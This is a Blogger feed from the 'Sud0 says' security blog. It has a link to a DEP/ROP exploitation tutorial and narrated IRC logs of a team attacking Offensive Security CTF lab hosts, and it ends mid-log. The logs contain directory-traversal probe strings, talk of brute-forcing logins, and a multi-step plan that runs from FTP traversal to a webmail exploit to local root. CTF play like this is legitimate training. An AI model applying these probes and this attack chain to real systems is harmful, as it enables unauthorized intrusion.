<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3514334976077913459</id><updated>2012-02-16T00:16:42.948-08:00</updated><category term='Jumping the n00bfilter'/><category term='Lincoln .... Our Hero'/><category term='Offsec CTF Intro'/><title type='text'>Sud0 says</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://sud0-says.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://sud0-says.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Sud0</name><uri>http://www.blogger.com/profile/09090618316098223592</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3514334976077913459.post-6338301911793288939</id><published>2010-06-08T01:14:00.000-07:00</published><updated>2010-06-08T01:26:12.926-07:00</updated><title type='text'>Bypassing DEP with WPM &amp; ROP</title><content type='html'>Hi,&lt;br /&gt;I won't be very long for the introduction, just to say that i just made my first tutorial and it's about bypassing DEP using ROP and WPM technique, the tutorial was written in may and kept private for the corelan team members since the exploit goes public on June 07th.&lt;br /&gt;&lt;br /&gt;I's a case study of the Audio Converter Software ad how to build a reliable exploit to bypass DEP, hope you will like it (PS: the paper is in PDF format).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.exploit-db.com/download_pdf/13764"&gt;Download link 1&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3514334976077913459-6338301911793288939?l=sud0-says.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sud0-says.blogspot.com/feeds/6338301911793288939/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://sud0-says.blogspot.com/2010/06/bypassing-dep-with-wpm-rop.html#comment-form' title='5 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/6338301911793288939'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/6338301911793288939'/><link rel='alternate' type='text/html' href='http://sud0-says.blogspot.com/2010/06/bypassing-dep-with-wpm-rop.html' title='Bypassing DEP with WPM &amp; ROP'/><author><name>Sud0</name><uri>http://www.blogger.com/profile/09090618316098223592</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3514334976077913459.post-8558798224859397655</id><published>2010-05-12T05:49:00.001-07:00</published><updated>2010-05-12T06:50:51.632-07:00</updated><title type='text'>CHAPTER 03 : GhostBusters</title><content type='html'>&lt;span style="font-weight: bold;"&gt;CHAPTER 03 / Part 01 : You said GHOST ????&lt;br /&gt;&lt;br /&gt;Now lets move  to the last machine, the devil's machine called GHOST, with same enthusiasm, bravour, with no tiredness and no fear the warriors keeped moving forward :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[01:37] &lt;@corelanc0d3r&gt; focus focus&lt;br /&gt;[01:37] &lt;@corelanc0d3r&gt; yep&lt;br /&gt;[01:38] &lt;@mr_me&gt; ok what is the next target&lt;br /&gt;[01:38] &lt;@mr_me&gt; lets go guys&lt;br /&gt;[01:38] &lt;@TecR0c&gt; 6.68&lt;br /&gt;[01:38] &lt;@TecR0c&gt; it is running php&lt;br /&gt;[01:38] &lt;@_sinn3r&gt; ok, let's try 6.68&lt;br /&gt;[01:39] &lt;@_sinn3r&gt; meh, only HTTP open&lt;br /&gt;[01:39] &lt;@TecR0c&gt; http://192.168.6.68/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000&lt;br /&gt;[01:39] &lt;@Lincoln&gt; lol&lt;br /&gt;[01:39] &lt;@Lincoln&gt; i wonder if they notice&lt;br /&gt;[01:39] &lt;@TecR0c&gt; so its got php credits&lt;br /&gt;[01:39] &lt;@mr_me&gt; php&lt;br /&gt;[01:39] &lt;@Lincoln&gt; that all of us get multiple points&lt;br /&gt;[01:39] &lt;@Lincoln&gt; at the same time&lt;br /&gt;[01:39] &lt;@TecR0c&gt; who cares&lt;br /&gt;[01:39] &lt;@TecR0c&gt; \&lt;br /&gt;[01:39] &lt;@TecR0c&gt; =]&lt;br /&gt;[01:39] &lt;@Lincoln&gt; hehe&lt;br /&gt;[01:39] &lt;@TecR0c&gt; lets win !&lt;br /&gt;[01:40] &lt;@Lincoln&gt; yes!&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;But faced to the psychotic power of the GHOST they got a little bit confused at the beginning :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[01:41] &lt;@_sinn3r&gt; Is the web app actually a PHP, or ASP?&lt;br /&gt;[01:41] &lt;@_sinn3r&gt; I'm seeing login.asp&lt;br /&gt;[01:41] &lt;@mr_me&gt; asp&lt;br /&gt;[01:41] &lt;@mr_me&gt; but php is install&lt;br /&gt;[01:41] &lt;@_sinn3r&gt; gotcha&lt;br /&gt;[01:41] &lt;@TecR0c&gt; it is IIS&lt;br /&gt;[01:41] &lt;@_sinn3r&gt; rick2600: we're doing the offsec ctf, currently in phase 2.&lt;br /&gt;[01:42] &lt;@_sinn3r&gt; past the noob filter&lt;br /&gt;[01:42] &lt;@TecR0c&gt; microsoft&lt;br /&gt;[01:43] &lt;@_sinn3r&gt; hmmm 6.68 isn't responding atm&lt;br /&gt;[01:43] &lt;@TecR0c&gt; http://192.168.6.66/Sites/Knowledge/Membership/Inspired/ViewCode.asp&lt;br /&gt;[01:44] &lt;@rick2600&gt; cool...&lt;br /&gt;[01:44] &lt;@TecR0c&gt; the vuln was patched in 2003&lt;br /&gt;[01:44] &lt;@TecR0c&gt; ;/&lt;br /&gt;[01:45] &lt;@_sinn3r&gt; http://192.168.6.68/asdfasdf&lt;br /&gt;[01:45] &lt;@_sinn3r&gt; haha... wtf&lt;br /&gt;[01:46] &lt;@TecR0c&gt; yep&lt;br /&gt;[01:46] &lt;@TecR0c&gt; private you will get&lt;br /&gt;[01:46] &lt;@TecR0c&gt; if the file doesn't exist&lt;br /&gt;[01:46] &lt;@_sinn3r&gt; si&lt;br /&gt;[01:47] &lt;@mr_me&gt; guys&lt;br /&gt;[01:47] &lt;@mr_me&gt; check this out&lt;br /&gt;[01:48] &lt;@TecR0c&gt; pattern&lt;br /&gt;[01:48] &lt;@mr_me&gt; http://192.168.6.68/test.asp?source=../../&lt;br /&gt;[01:48] &lt;@_sinn3r&gt; huh.......&lt;br /&gt;[01:48] &lt;@mr_me&gt; some dodgy stuff here&lt;br /&gt;[01:48] &lt;@Lincoln&gt; rolf&lt;br /&gt;[01:48] &lt;@Lincoln&gt; that looks like my cat&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;However nothing stopped them and _sinn3r found a tresor of the GHOST :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[01:48] &lt;@TecR0c&gt; if you go ../ up and down&lt;br /&gt;[01:48] &lt;@TecR0c&gt; you will see&lt;br /&gt;[01:48] &lt;@TecR0c&gt; i think this is a big clue&lt;br /&gt;[01:48] &lt;@mr_me&gt; it changes&lt;br /&gt;[01:48] &lt;@_sinn3r&gt; I see a butt&lt;br /&gt;[01:49] &lt;@mr_me&gt; right&lt;br /&gt;[01:49] &lt;@_sinn3r&gt; i think it just changes randomly&lt;br /&gt;[01:49] &lt;@mr_me&gt; keep transversing&lt;br /&gt;[01:49] &lt;@mr_me&gt; really&lt;br /&gt;[01:49] &lt;@_sinn3r&gt; when you see the butt image, see the html....&lt;br /&gt;[01:49] &lt;@_sinn3r&gt; no pic code, no css&lt;br /&gt;[01:50] &lt;@mr_me&gt; yeh&lt;br /&gt;[01:50] &lt;@mr_me&gt; odd&lt;br /&gt;&lt;br /&gt;after a little working on that machine, mr_me really understand what they are facing :&lt;br /&gt;&lt;br /&gt;06[01:51] &lt;~corelanc0d3r&gt; try source=alert();&lt;br /&gt;[01:52] &lt;@_sinn3r&gt; wait, there is javascript&lt;br /&gt;[01:52] &lt;@TecR0c&gt; dont thinkn alert();&lt;br /&gt;[01:52] &lt;@TecR0c&gt; is anything&lt;br /&gt;[01:52] &lt;@TecR0c&gt; _sinn3r, where is the js ?&lt;br /&gt;[01:53] &lt;@_sinn3r&gt; guys&lt;br /&gt;[01:53] &lt;@_sinn3r&gt; wget 192.168.6.68/javascript&lt;br /&gt;[01:53] &lt;@corelanc0d3r&gt; javascript is a file right ?&lt;br /&gt;[01:53] &lt;@_sinn3r&gt; yes, a file&lt;br /&gt;[01:53] &lt;@TecR0c&gt; oh hello&lt;br /&gt;[01:53] &lt;@TecR0c&gt; lol&lt;br /&gt;[01:53] &lt;@corelanc0d3r&gt; time for some reversing :D&lt;br /&gt;[01:53] &lt;@TecR0c&gt; thats the code playing&lt;br /&gt;[01:53] &lt;@TecR0c&gt; with the images !&lt;br /&gt;[01:53] &lt;@_sinn3r&gt; yes&lt;br /&gt;[01:54] &lt;@mr_me&gt; basterds&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Now they started to use the massive destruction weapons &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:04] &lt;@TecR0c&gt; got a udp scan ?&lt;br /&gt;[02:04] &lt;~corelanc0d3r&gt; I'll do one&lt;br /&gt;[02:05] &lt;@TecR0c&gt; thanks&lt;br /&gt;[02:05] &lt;@Lincoln&gt; only checked this&lt;br /&gt;[02:05] &lt;@Lincoln&gt; 161/udp closed snmp&lt;br /&gt;[02:05] &lt;@TecR0c&gt; do you know how to test udp ports with nc ?&lt;br /&gt;[02:05] &lt;@corelanc0d3r&gt; nope, I thought it was tcp only&lt;br /&gt;[02:05] &lt;@Lincoln&gt; -u&lt;br /&gt;[02:05] &lt;@corelanc0d3r&gt; not sure&lt;br /&gt;[02:05] &lt;@corelanc0d3r&gt; -U ?&lt;br /&gt;[02:05] &lt;@corelanc0d3r&gt; ok&lt;br /&gt;[02:05] &lt;@Lincoln&gt; yes&lt;br /&gt;[02:06] &lt;@Lincoln&gt; port scanning so slow, tried to do all 1-65535 will take until next year&lt;br /&gt;[02:06] &lt;@Lincoln&gt; bet there is another service running on some port&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;At the same time, the great warrior corelanc0d3r started his mystic approach and found a first vuln in the GHOST:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:06] &lt;@corelanc0d3r&gt; haha http://192.168.6.66/1/%&lt;br /&gt;[02:06] &lt;@corelanc0d3r&gt; bad ph33r&lt;br /&gt;[02:06] &lt;@corelanc0d3r&gt; :D&lt;br /&gt;[02:08] &lt;@TecR0c&gt; lol&lt;br /&gt;[02:09] &lt;@TecR0c&gt; http://192.168.6.68/corelanteam/%&lt;br /&gt;[02:09] &lt;@TecR0c&gt; ;)&lt;br /&gt;[02:09] &lt;@corelanc0d3r&gt; lol&lt;br /&gt;[02:09] &lt;@corelanc0d3r&gt; so they have some input validation&lt;br /&gt;[02:09] &lt;@corelanc0d3r&gt; triggers on %&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Unfortunately in the other dimention, some no fair action were taken against the team :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:12] &lt;@corelanc0d3r&gt; looks like some dude posted solution to phase1 in the HSIYF channel&lt;br /&gt;[02:12] &lt;@corelanc0d3r&gt; wtf - that's not really fair&lt;br /&gt;[02:12] &lt;@Lincoln&gt; aww lame&lt;br /&gt;[02:13] &lt;@TecR0c&gt; ah&lt;br /&gt;[02:13] &lt;@mr_me&gt; fukn hell&lt;br /&gt;[02:13] &lt;@mr_me&gt; thats bad&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After a UDP scan fight and an unseccessful snmp approach, Time to stop the machine, and start thinking, and that's the power of the team, thinking and sharing :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:28] &lt;~corelanc0d3r&gt; what is the difference between the index.asp page and /1/index.asp page ?&lt;br /&gt;[02:28] &lt;~corelanc0d3r&gt; different post operations&lt;br /&gt;[02:28] &lt;~corelanc0d3r&gt; differend field names&lt;br /&gt;[02:28] &lt;~corelanc0d3r&gt; perhaps there's a bug where you can feed an asp page and make the app think it's an image&lt;br /&gt;[02:28] &lt;@chap0&gt; one fake one real :D just guessing&lt;br /&gt;[02:29] &lt;@mr_me&gt; ok possible path to execution&lt;br /&gt;[02:29] &lt;@mr_me&gt; lets realli think&lt;br /&gt;[02:29] &lt;@mr_me&gt; we dont have much on this one&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;But they really needed some rest, so they took a little time to play with a nice pirate picture :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:30] &lt;@corelanc0d3r&gt; was just playing with some url's&lt;br /&gt;[02:30] &lt;@corelanc0d3r&gt; like this&lt;br /&gt;[02:31] &lt;@corelanc0d3r&gt; http://192.168.6.66/index.asp/1/BBP.jpg&lt;br /&gt;[02:31] &lt;@corelanc0d3r&gt; just playing&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;TecR0c and corelanc0d3r came with new and fresh idea as always, thinking out of the box is very important :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:33] &lt;@TecR0c&gt; we cracking those hashes ?&lt;br /&gt;[02:33] &lt;@TecR0c&gt; maybe u need them to login&lt;br /&gt;[02:33] &lt;@corelanc0d3r&gt; yeah good idea&lt;br /&gt;[02:33] &lt;@corelanc0d3r&gt; machine1 : only one IP&lt;br /&gt;[02:33] &lt;@corelanc0d3r&gt; dns servers on 192.168.6.1&lt;br /&gt;[02:33] &lt;@corelanc0d3r&gt; zone transfers ?&lt;br /&gt;[02:35] &lt;@TecR0c&gt; 192.168.64.2 i think is there dns server&lt;br /&gt;[02:35] &lt;@mr_me&gt; sinn3r: you check the images?&lt;br /&gt;[02:35] &lt;@mr_me&gt; _sinn3r*&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Acting and thinking like hackers, every techniques was tried :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[02:49] &lt;@TecR0c&gt; maybe we need to do social engineering&lt;br /&gt;[02:49] &lt;@TecR0c&gt; lolll&lt;br /&gt;[02:49] &lt;@TecR0c&gt; anyone got muts numbe r?&lt;br /&gt;[02:49] &lt;@corelanc0d3r&gt; haha we can PM him&lt;br /&gt;[02:50] &lt;@_sinn3r&gt; I tried&lt;br /&gt;&lt;br /&gt;A little bit of confusion came again :&lt;br /&gt;&lt;br /&gt;[02:52] &lt;@corelanc0d3r&gt; are we sure this is a IIS server ?&lt;br /&gt;[02:52] &lt;@TecR0c&gt; can we run fasttrack&lt;br /&gt;[02:52] &lt;@TecR0c&gt; lol&lt;br /&gt;[02:52] &lt;@_sinn3r&gt; it says Microsoft&lt;br /&gt;[02:52] &lt;@mr_me&gt; yes&lt;br /&gt;[02:52] &lt;@corelanc0d3r&gt; where does it say Microsoft ?&lt;br /&gt;[02:53] &lt;@mr_me&gt; def iis&lt;br /&gt;[02:53] &lt;@TecR0c&gt; yep&lt;br /&gt;[02:53] &lt;@mr_me&gt; in the .asp extension :P&lt;br /&gt;[02:53] &lt;@_sinn3r&gt; sniff it with wireshark, you'll see it.&lt;br /&gt;[02:53] &lt;@corelanc0d3r&gt; no way they tried to make it look like IIS ?&lt;br /&gt;[02:53] &lt;@_sinn3r&gt; possible&lt;br /&gt;[02:53] &lt;@corelanc0d3r&gt; I mean could be vulnerable apache version&lt;br /&gt;[02:53] &lt;@mr_me&gt; true&lt;br /&gt;[02:53] &lt;@corelanc0d3r&gt; changed&lt;br /&gt;[02:54] &lt;@_sinn3r&gt; "Server: Microsoft-IIS "&lt;br /&gt;[02:54] &lt;@corelanc0d3r&gt; I can do that on Apache as well&lt;br /&gt;[02:54] &lt;@corelanc0d3r&gt; mod_rewrite etc&lt;br /&gt;[02:54] &lt;@_sinn3r&gt; yeah, I know...&lt;br /&gt;[02:54] &lt;@corelanc0d3r&gt; the behaviour just looks like mod_rewrite to me&lt;br /&gt;[02:54] &lt;@mr_me&gt; corelanc0d3r: ill try other os detectors&lt;br /&gt;[02:55] &lt;@corelanc0d3r&gt; k&lt;br /&gt;[02:55] &lt;@TecR0c&gt; http://192.168.6.67/Sites/&lt;br /&gt;[02:55] &lt;@TecR0c&gt; says Microsoft IIS&lt;br /&gt;[02:55] &lt;@TecR0c&gt; there&lt;br /&gt;[02:55] &lt;@Lincoln&gt; im pilfering through .70 for anything, clues&lt;br /&gt;[02:55] &lt;@Lincoln&gt; nada&lt;br /&gt;[02:55] &lt;@corelanc0d3r&gt; yeah, again&lt;br /&gt;[02:55] &lt;@TecR0c&gt; doesn't look that rela though&lt;br /&gt;[02:55] &lt;@corelanc0d3r&gt; they could have tried hard to make it look like IIS&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;It's 03:07 AM when corelanc0d3r found finally a back door&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[03:07] &lt;@corelanc0d3r&gt; the pic with the butt is some kind of door&lt;br /&gt;[03:07] &lt;@corelanc0d3r&gt; it's a backdoor, but still a door&lt;br /&gt;[03:07] &lt;@corelanc0d3r&gt; :D&lt;br /&gt;[03:07] &lt;@_sinn3r&gt; ew&lt;br /&gt;[03:07] &lt;@Lincoln&gt; rolf&lt;br /&gt;[03:07] &lt;@_sinn3r&gt; noooooooooooo&lt;br /&gt;[03:07] &lt;@corelanc0d3r&gt; yeah I know - bad joke&lt;br /&gt;[03:07] &lt;@_sinn3r&gt; :-D&lt;br /&gt;[03:07] &lt;@_sinn3r&gt; lol&lt;br /&gt;[03:07] &lt;@TecR0c&gt; im not going to execute that&lt;br /&gt;[03:07] &lt;@TecR0c&gt; ;/&lt;br /&gt;[03:07] &lt;@chap0&gt; hahaha&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After being desesperated the mystic corelanc0d3r remembred the team about corelan's team Slogan :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[03:13] &lt;@corelanc0d3r&gt; Corelan Slogan : Never underestimate the power of...&lt;br /&gt;[03:13] &lt;@corelanc0d3r&gt; ummm..&lt;br /&gt;[03:13] &lt;@corelanc0d3r&gt; ... underestimation ?&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After searching on Apache exploits, ssl exploits, hidden modules vulnerability they started to talk in an uncomprehensible language :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[03:17] &lt;@corelanc0d3r&gt; what do you mean ?&lt;br /&gt;[03:17] &lt;@_sinn3r&gt; i meant ":-p"&lt;br /&gt;[03:17] &lt;@_sinn3r&gt; sorry&lt;br /&gt;[03:17] &lt;@corelanc0d3r&gt; haha :D&lt;br /&gt;[03:17] &lt;@_sinn3r&gt; lol&lt;br /&gt;[03:17] &lt;@corelanc0d3r&gt; and sus = ?&lt;br /&gt;[03:18] &lt;@mr_me&gt; sus peciaous&lt;br /&gt;[03:18] &lt;@corelanc0d3r&gt; haha&lt;br /&gt;[03:18] &lt;@mr_me&gt; suspecious&lt;br /&gt;[03:18] &lt;@corelanc0d3r&gt; okido&lt;br /&gt;[03:18] &lt;@mr_me&gt; yeh&lt;br /&gt;[03:19] &lt;@TecR0c&gt; damn&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;To Be Continued ...&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3514334976077913459-8558798224859397655?l=sud0-says.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sud0-says.blogspot.com/feeds/8558798224859397655/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://sud0-says.blogspot.com/2010/05/chapter-03-ghostbusters.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/8558798224859397655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/8558798224859397655'/><link rel='alternate' type='text/html' href='http://sud0-says.blogspot.com/2010/05/chapter-03-ghostbusters.html' title='CHAPTER 03 : GhostBusters'/><author><name>Sud0</name><uri>http://www.blogger.com/profile/09090618316098223592</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3514334976077913459.post-8307945922994661498</id><published>2010-05-11T07:32:00.000-07:00</published><updated>2010-05-12T05:46:26.215-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Lincoln .... Our Hero'/><title type='text'>CHAPTER 02 : Killing the n00bKiller</title><content type='html'>Chapter 2 - PART 01 : Searching the graves&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Entring to the VPN we had to fix our objectives and that's the speciality of TecR0c :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[18:32] &lt;@TecR0c&gt; the target is actually&lt;br /&gt;[18:32] &lt;@TecR0c&gt; http://192.168.6.67/&lt;br /&gt;[18:32] &lt;@TecR0c&gt; muahahaha&lt;br /&gt;[18:33] &lt;@Sud0&gt; hahahaha&lt;br /&gt;[18:33] &lt;@Sud0&gt; np&lt;br /&gt;[18:33] &lt;@Sud0&gt; :)&lt;br /&gt;[18:33] &lt;@mr_me&gt; nice brother&lt;br /&gt;[18:33] &lt;@TecR0c&gt; we are gonna own this !&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Some minutes later a bige silence was in the irc channel :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[18:39] &lt;@Sud0&gt; anyone here ?&lt;br /&gt;[18:40] &lt;@mr_me&gt; we are here&lt;br /&gt;[18:40] &lt;@mr_me&gt; just working&lt;br /&gt;[18:40] &lt;@mr_me&gt; my freind&lt;br /&gt;[18:40] &lt;@mr_me&gt; :)&lt;br /&gt;[18:42] &lt;@Sud0&gt; though&lt;br /&gt;[18:42] &lt;@Sud0&gt; i lost connection&lt;br /&gt;[18:42] &lt;@Sud0&gt; nothing was mooving here :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;As i said before, TecR0c was expert to select targets, so we have to change target again ;) &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[18:47] &lt;@TecR0c&gt; 71 72 are the same aswell&lt;br /&gt;[18:48] &lt;@Sud0&gt; i saw it&lt;br /&gt;[18:48] &lt;@ekse&gt; hi guys&lt;br /&gt;[18:48] &lt;@Sud0&gt; hi ekse&lt;br /&gt;[18:49] &lt;@TecR0c&gt; you can ftp to 192.168.6.70&lt;br /&gt;[18:49] &lt;@TecR0c&gt; anonymous&lt;br /&gt;[18:50] &lt;@mr_me&gt; ftp access&lt;br /&gt;[18:50] &lt;@TecR0c&gt; yep it windows 7 utimate&lt;br /&gt;[18:51] &lt;@Sud0&gt; yes&lt;br /&gt;[18:51] &lt;@TecR0c&gt; i think its 64bit aswell&lt;br /&gt;[18:51] &lt;@Sud0&gt; directory traversal&lt;br /&gt;[18:51] &lt;@Sud0&gt; not working&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Always following TechR0c, he want to use a new ROP technique :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[18:51] &lt;@TecR0c&gt; lets do ROP&lt;br /&gt;[18:51] &lt;@TecR0c&gt; lol&lt;br /&gt;[18:52] &lt;@Sud0&gt; hahaha&lt;br /&gt;[18:53] &lt;@Sud0&gt; @TecR0c alll suregemail are post auth exploit&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Then mr_me arrived with a new fresh, sweet and technical ideas :)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[19:25] &lt;@Sud0&gt; hola mr_me&lt;br /&gt;[19:26] &lt;@mr_me&gt; Sud0: hola&lt;br /&gt;[19:26] &lt;@mr_me&gt; ok so im abit stumped&lt;br /&gt;[19:26] &lt;@Sud0&gt; ssup ? :)&lt;br /&gt;[19:26] &lt;@Sud0&gt; hahah&lt;br /&gt;[19:27] &lt;@Sud0&gt; what's happening ?&lt;br /&gt;[19:27] &lt;@mr_me&gt; 6.67 is just login prompt&lt;br /&gt;[19:27] &lt;@mr_me&gt; prompts&lt;br /&gt;[19:27] &lt;@Sud0&gt; hahahaha yes&lt;br /&gt;[19:27] &lt;@mr_me&gt; and 6.70 webmail&lt;br /&gt;[19:27] &lt;@mr_me&gt; duno yet&lt;br /&gt;[19:27] &lt;@Sud0&gt; yup :)&lt;br /&gt;[19:27] &lt;@mr_me&gt; i might bruteforce a pop account&lt;br /&gt;[19:27] &lt;@mr_me&gt; or ftp&lt;br /&gt;[19:27] &lt;@mr_me&gt; but duno any undernsmae&lt;br /&gt;[19:27] &lt;@mr_me&gt; usernames**&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After That TecR0c did an extraordinary discovery using his ROP technique&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[19:36] &lt;@TecR0c&gt; wdf&lt;br /&gt;[19:36] &lt;@TecR0c&gt; its linux box&lt;br /&gt;[19:36] &lt;@_sinn3r&gt; are you guys playing w/ CTF at the moment?&lt;br /&gt;[19:37] &lt;@Sud0&gt; @mr_me not vuln on that&lt;br /&gt;[19:37] &lt;@Sud0&gt; yes _sinn3r and u ?&lt;br /&gt;[19:37] &lt;@_sinn3r&gt; at the moment, no&lt;br /&gt;[19:37] &lt;@TecR0c&gt; its ubuntu 8.10&lt;br /&gt;[19:37] &lt;@TecR0c&gt; ;)&lt;br /&gt;[19:37] &lt;@Sud0&gt; what IP TecR0c ?&lt;br /&gt;[19:37] &lt;@_sinn3r&gt; kinda busy with exploit-db... lots of tickets.&lt;br /&gt;[19:38] &lt;@TecR0c&gt; 71&lt;br /&gt;[19:38] &lt;@_sinn3r&gt; I did hear it's pretty nasty... a couple guys at exploit-db were working on the CTF labs.&lt;br /&gt;[19:38] &lt;@TecR0c&gt; ah&lt;br /&gt;[19:38] &lt;@TecR0c&gt; wait&lt;br /&gt;[19:38] &lt;@TecR0c&gt; lol&lt;br /&gt;[19:38] &lt;@TecR0c&gt; its my machine hehe&lt;br /&gt;[19:38] &lt;@TecR0c&gt; =]&lt;br /&gt;[19:38] &lt;@Sud0&gt; hahahahahhahaha&lt;br /&gt;[19:38] &lt;@Sud0&gt; hahahahahhahaha&lt;br /&gt;[19:38] &lt;@TecR0c&gt; got excited for one sec&lt;br /&gt;[19:38] &lt;@TecR0c&gt; :P&lt;br /&gt;[19:40] &lt;@Sud0&gt; héhé&lt;br /&gt;[19:41] &lt;@Sud0&gt; 71 ---&gt; vista ultimate ;)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After analysing the machine, we agreed to make a nice plan :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[20:51] &lt;@Sud0&gt; @tecR0c    21 -------------&gt; should be vuln to directory traversal&lt;br /&gt;[20:52] &lt;@TecR0c&gt; so what we need to do ?&lt;br /&gt;[20:52] &lt;@Sud0&gt; 1- got a directory traversal&lt;br /&gt;[20:52] &lt;@Sud0&gt; here is the scenario&lt;br /&gt;[20:53] &lt;@Sud0&gt; 1- directory traversal on Complete FTP&lt;br /&gt;[20:53] &lt;@Sud0&gt; 2- Get an account on webmail&lt;br /&gt;[20:53] &lt;@Sud0&gt; 3- use a remote exploit against webmail to get root (i ment shell)&lt;br /&gt;[20:53] &lt;@Sud0&gt; 4- use a local root exploit against qualcomm popassd&lt;br /&gt;[20:53] &lt;@Sud0&gt; got it ?&lt;br /&gt;[20:53] &lt;@mr_me&gt; yeh&lt;br /&gt;[20:54] &lt;@mr_me&gt; qualcom&lt;br /&gt;[20:54] &lt;@mr_me&gt; we knew&lt;br /&gt;[20:54] &lt;@TecR0c&gt; cool&lt;br /&gt;[20:54] &lt;@TecR0c&gt; ok lets make this happenn&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After 06 Hour of trying a Directory traversal as anonymous against machine 70 without success Lincoln came to save us :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[23:30] &lt;@corelanc0d3r&gt; doing full scan&lt;br /&gt;[23:30] &lt;@Lincoln&gt; cd \..\..\&lt;br /&gt;[23:31] &lt;@Sud0&gt; @Lincoln : not working with me&lt;br /&gt;[23:31] &lt;@Sud0&gt; i tested it 10000 times&lt;br /&gt;[23:32] &lt;@Sud0&gt; @Lincoln don't work cd \..\..\&lt;br /&gt;[23:32] &lt;@Lincoln&gt; ftp&gt; pwd&lt;br /&gt;[23:32] &lt;@Lincoln&gt; 257 "/MyDocuments" is current directory.&lt;br /&gt;[23:32] &lt;@Lincoln&gt; ftp&gt; ls&lt;br 